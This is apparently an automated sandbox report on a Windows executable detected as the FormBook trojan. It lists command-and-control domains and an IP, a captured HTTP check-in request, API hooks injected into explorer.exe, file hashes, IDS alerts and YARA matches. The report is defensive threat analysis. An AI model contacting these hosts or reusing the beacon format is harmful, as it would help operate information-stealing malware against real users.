                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.52cy67sk.bond/bc01/MMflexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.olocaustaffirmer.net/bc01/www.lkjuy.xyzexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9kexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.ewferg.topexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      http://www.refabricated-homes-74404.bond/bc01/www.nline-degree-6987776.worldexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://ns.adobeSexplorer.exe, 00000006.00000000.1561108921.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2808794232.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-darkexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.avada-casino-tlj.buzzReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://www.52cy67sk.bond/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&ocexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.ajabandot.website/bc01/www.y-language-menu.netexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.26.122.70 | www.oko.events | Russian Federation | 62082 | HOSTLANDRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1549204
Start date and time: 2024-11-05 12:27:17 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: TEKL#U0130F #U0130ST.exe (renamed because the original name is a hash value)
Original Sample Name: TEKLF ST.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@12/6@6/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 97
• Number of non-executed functions: 337
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: TEKL#U0130F #U0130ST.exe
Time | Type | Description
06:28:28 | API Interceptor | 1x Sleep call for process: TEKL#U0130F #U0130ST.exe modified
06:28:29 | API Interceptor | 15x Sleep call for process: powershell.exe modified
06:28:37 | API Interceptor | 1955963x Sleep call for process: explorer.exe modified
06:29:13 | API Interceptor | 2120846x Sleep call for process: mstsc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.26.122.70 | hbwebdownload - MT 103.exe | malicious | FormBook | www.oko.events/c24t/?Edg8Tp=z+nAhoA8drw9p0SUk4F23aiKXvdwmiYumykkUl5XSRWt3Wct2pK+VZvxUbO0lNj685To&iL30=-ZRd9JBXfLe8q2J
185.26.122.70 | docs.exe | malicious | FormBook | www.oko.events/c24t/?I6=z+nAhoA8drw9p0SUk4F23aiKXvdwmiYumykkUl5XSRWt3Wct2pK+VZvxUbC02dv5lpT+B1+jbQ==&AL0=9rN46F
185.26.122.70 | Dekont.exe | malicious | FormBook | www.oko.events/bc01/?L0D=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObEUMh//SmEX6&2dptmT=8paLMJPH3rxHgFq0
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.oko.events | RFQ 245801.exe | malicious | FormBook | 185.26.122.70
www.oko.events | hbwebdownload - MT 103.exe | malicious | FormBook | 185.26.122.70
www.oko.events | docs.exe | malicious | FormBook | 185.26.122.70
www.oko.events | Dekont.exe | malicious | FormBook | 185.26.122.70
www.oko.events | Quotation #10091.exe | malicious | FormBook | 185.26.122.70
www.oko.events | PAGO_200924.exe | malicious | FormBook | 185.26.122.70
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HOSTLANDRU | hbwebdownload - MT 103.exe | malicious | FormBook | 185.26.122.70
HOSTLANDRU | docs.exe | malicious | FormBook | 185.26.122.70
HOSTLANDRU | Dekont.exe | malicious | FormBook | 185.26.122.70
HOSTLANDRU | Wave.exe | malicious | Discord Token Stealer, Orcus, SugarDump | 185.37.62.158
HOSTLANDRU | DFpUKTL6kg.exe | malicious | DCRat | 185.26.122.81
HOSTLANDRU | http://mydpd.space/ | malicious | DCRat, PureLog Stealer | 185.26.122.30
HOSTLANDRU | HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | malicious | DCRat | 185.26.122.79
HOSTLANDRU | yk2Eh24FDd.exe | malicious | Unknown | 185.26.122.81
HOSTLANDRU | hT0xyYJthf.exe | malicious | Unknown | 185.26.122.81
HOSTLANDRU | https://hideuri.com/EXWJgm | malicious | Unknown | 185.26.122.79
Process: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.379460230152629
Encrypted: false
SSDEEP: 48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//Z+Uyus:fLHyIFKL3IZ2KRH9OugIs
MD5: 20F0CD8CB676A3CFD7FEBA208EB2D8A8
SHA1: BE4D606BA8093E8B6F7FB2940FA86175228072CA
SHA-256: 40A3192A587B2F17788D0EA113062BA264F23C6D1A9C3F09ECCB1E5EB52D7596
SHA-512: AA04A44877E89603F1F3AF1A35C9CFA491C1532C5EF8780AE17861325C123686F38E778CCB57EF0D6973CB327A12A4AEC101420F460232CA1C084A259F07F498
Malicious: false
Reputation: low
                                                                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.5831063423984535
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: TEKL#U0130F #U0130ST.exe
File size: 743'936 bytes
MD5: 88153ac6837f5034a7ab44259c90f4dd
SHA1: 90085bacffa3b6a75252f9e06af2d7ac54886e75
SHA256: 23bc8acbb8a1e716512ac2ea9426d3fc46938cccac426f344c0314aafb17769e
SHA512: fc5fa3bc1ad16fa3e1e8988253da0479b9235c7d051d82cde50e3da6ca95acff6d20483b4dc52778015f2344cc1edca68e9b184f8f507479b3ada5bf594be8cc
SSDEEP: 12288:MOX2iRzjEZ3eBNdQ6LN5LD8MYoSrwb+dpXeboencW3:MOmYzwIBDRjLHY7rhXeDncW3
TLSH: 2FF49CC03A363B29DE7857F58A19DCB103B51968B405FAE25EDE77C73489B11AA08F43
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.)g..............0..P...........o... ........@.. ....................................@................................
                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                            Entrypoint:0x4b6fe6
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x6729CF3E [Tue Nov 5 07:54:38 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb6f94 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb8000 | 0x5ec | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb3e88 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb4fec | 0xb5000 | 8c50279a95550a3c4f0ebd91e38af0a0 | False | 0.8186439809219613 | data | 7.59023926160002 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb8000 | 0x5ec | 0x600 | e84f8ddefc7f2c052d03e1754b03a32f | False | 0.427734375 | data | 4.179397032457229 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xba000 | 0xc | 0x200 | 8a4284c71495e81775e5401a68e3b916 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xb8090 | 0x35c | data | | | 0.4127906976744186
RT_MANIFEST | 0xb83fc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-05T12:28:47.553120+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.8 | 49712 | TCP
2024-11-05T12:29:25.966033+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.8 | 49717 | TCP
2024-11-05T12:29:47.524742+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.8 | 49784 | 185.26.122.70 | 80 | TCP
2024-11-05T12:29:47.524742+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.8 | 49784 | 185.26.122.70 | 80 | TCP
2024-11-05T12:29:47.524742+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.8 | 49784 | 185.26.122.70 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 5, 2024 12:29:46.896998882 CET | 49784 | 80 | 192.168.2.8 | 185.26.122.70
Nov 5, 2024 12:29:46.901932955 CET | 80 | 49784 | 185.26.122.70 | 192.168.2.8
Nov 5, 2024 12:29:46.901983976 CET | 49784 | 80 | 192.168.2.8 | 185.26.122.70
Nov 5, 2024 12:29:46.902084112 CET | 49784 | 80 | 192.168.2.8 | 185.26.122.70
Nov 5, 2024 12:29:46.906986952 CET | 80 | 49784 | 185.26.122.70 | 192.168.2.8
Nov 5, 2024 12:29:47.396303892 CET | 49784 | 80 | 192.168.2.8 | 185.26.122.70
Nov 5, 2024 12:29:47.448157072 CET | 80 | 49784 | 185.26.122.70 | 192.168.2.8
Nov 5, 2024 12:29:47.524643898 CET | 80 | 49784 | 185.26.122.70 | 192.168.2.8
Nov 5, 2024 12:29:47.524741888 CET | 49784 | 80 | 192.168.2.8 | 185.26.122.70
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 5, 2024 12:29:07.412823915 CET | 60734 | 53 | 192.168.2.8 | 1.1.1.1
Nov 5, 2024 12:29:07.421602964 CET | 53 | 60734 | 1.1.1.1 | 192.168.2.8
Nov 5, 2024 12:29:27.162455082 CET | 55030 | 53 | 192.168.2.8 | 1.1.1.1
Nov 5, 2024 12:29:27.184720993 CET | 53 | 55030 | 1.1.1.1 | 192.168.2.8
Nov 5, 2024 12:29:46.803442001 CET | 60963 | 53 | 192.168.2.8 | 1.1.1.1
Nov 5, 2024 12:29:46.896394968 CET | 53 | 60963 | 1.1.1.1 | 192.168.2.8
Nov 5, 2024 12:30:07.506525040 CET | 52988 | 53 | 192.168.2.8 | 1.1.1.1
Nov 5, 2024 12:30:07.528722048 CET | 53 | 52988 | 1.1.1.1 | 192.168.2.8
Nov 5, 2024 12:30:28.273245096 CET | 55824 | 53 | 192.168.2.8 | 1.1.1.1
Nov 5, 2024 12:30:28.295892000 CET | 53 | 55824 | 1.1.1.1 | 192.168.2.8
Nov 5, 2024 12:30:49.693866014 CET | 54732 | 53 | 192.168.2.8 | 1.1.1.1
Nov 5, 2024 12:30:49.709728003 CET | 53 | 54732 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 5, 2024 12:29:07.412823915 CET | 192.168.2.8 | 1.1.1.1 | 0xd467 | Standard query (0) | www.2ar1.shop | A (IP address) | IN (0x0001) | false
Nov 5, 2024 12:29:27.162455082 CET | 192.168.2.8 | 1.1.1.1 | 0x6b35 | Standard query (0) | www.obs-for-seniors-39582.bond | A (IP address) | IN (0x0001) | false
Nov 5, 2024 12:29:46.803442001 CET | 192.168.2.8 | 1.1.1.1 | 0x3d8b | Standard query (0) | www.oko.events | A (IP address) | IN (0x0001) | false
Nov 5, 2024 12:30:07.506525040 CET | 192.168.2.8 | 1.1.1.1 | 0x8dcd | Standard query (0) | www.aming-chair-83359.bond | A (IP address) | IN (0x0001) | false
Nov 5, 2024 12:30:28.273245096 CET | 192.168.2.8 | 1.1.1.1 | 0xa067 | Standard query (0) | www.refabricated-homes-74404.bond | A (IP address) | IN (0x0001) | false
Nov 5, 2024 12:30:49.693866014 CET | 192.168.2.8 | 1.1.1.1 | 0x35e8 | Standard query (0) | www.nline-degree-6987776.world | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 5, 2024 12:29:07.421602964 CET | 1.1.1.1 | 192.168.2.8 | 0xd467 | Name error (3) | www.2ar1.shop | none | none | A (IP address) | IN (0x0001) | false
Nov 5, 2024 12:29:27.184720993 CET | 1.1.1.1 | 192.168.2.8 | 0x6b35 | Name error (3) | www.obs-for-seniors-39582.bond | none | none | A (IP address) | IN (0x0001) | false
Nov 5, 2024 12:29:46.896394968 CET | 1.1.1.1 | 192.168.2.8 | 0x3d8b | No error (0) | www.oko.events | | 185.26.122.70 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 12:30:07.528722048 CET | 1.1.1.1 | 192.168.2.8 | 0x8dcd | Name error (3) | www.aming-chair-83359.bond | none | none | A (IP address) | IN (0x0001) | false
Nov 5, 2024 12:30:28.295892000 CET | 1.1.1.1 | 192.168.2.8 | 0xa067 | Name error (3) | www.refabricated-homes-74404.bond | none | none | A (IP address) | IN (0x0001) | false
Nov 5, 2024 12:30:49.709728003 CET | 1.1.1.1 | 192.168.2.8 | 0x35e8 | Name error (3) | www.nline-degree-6987776.world | none | none | A (IP address) | IN (0x0001) | false
                                                                                                            • www.oko.events
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49784 | 185.26.122.70 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 12:29:46.902084112 CET | 163 | OUT | see below
Data:
GET /bc01/?DbJ=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObH0Tqfvq8jqw&P2J=ejoHnvmXAnKhhd HTTP/1.1
Host: www.oko.events
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


                                                                                                            Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE5
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE5
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE5
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE5


                                                                                                            Target ID:0
                                                                                                            Start time:06:28:27
                                                                                                            Start date:05/11/2024
                                                                                                            Path:C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
                                                                                                            Imagebase:0xbe0000
                                                                                                            File size:743'936 bytes
                                                                                                            MD5 hash:88153AC6837F5034A7AB44259C90F4DD
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
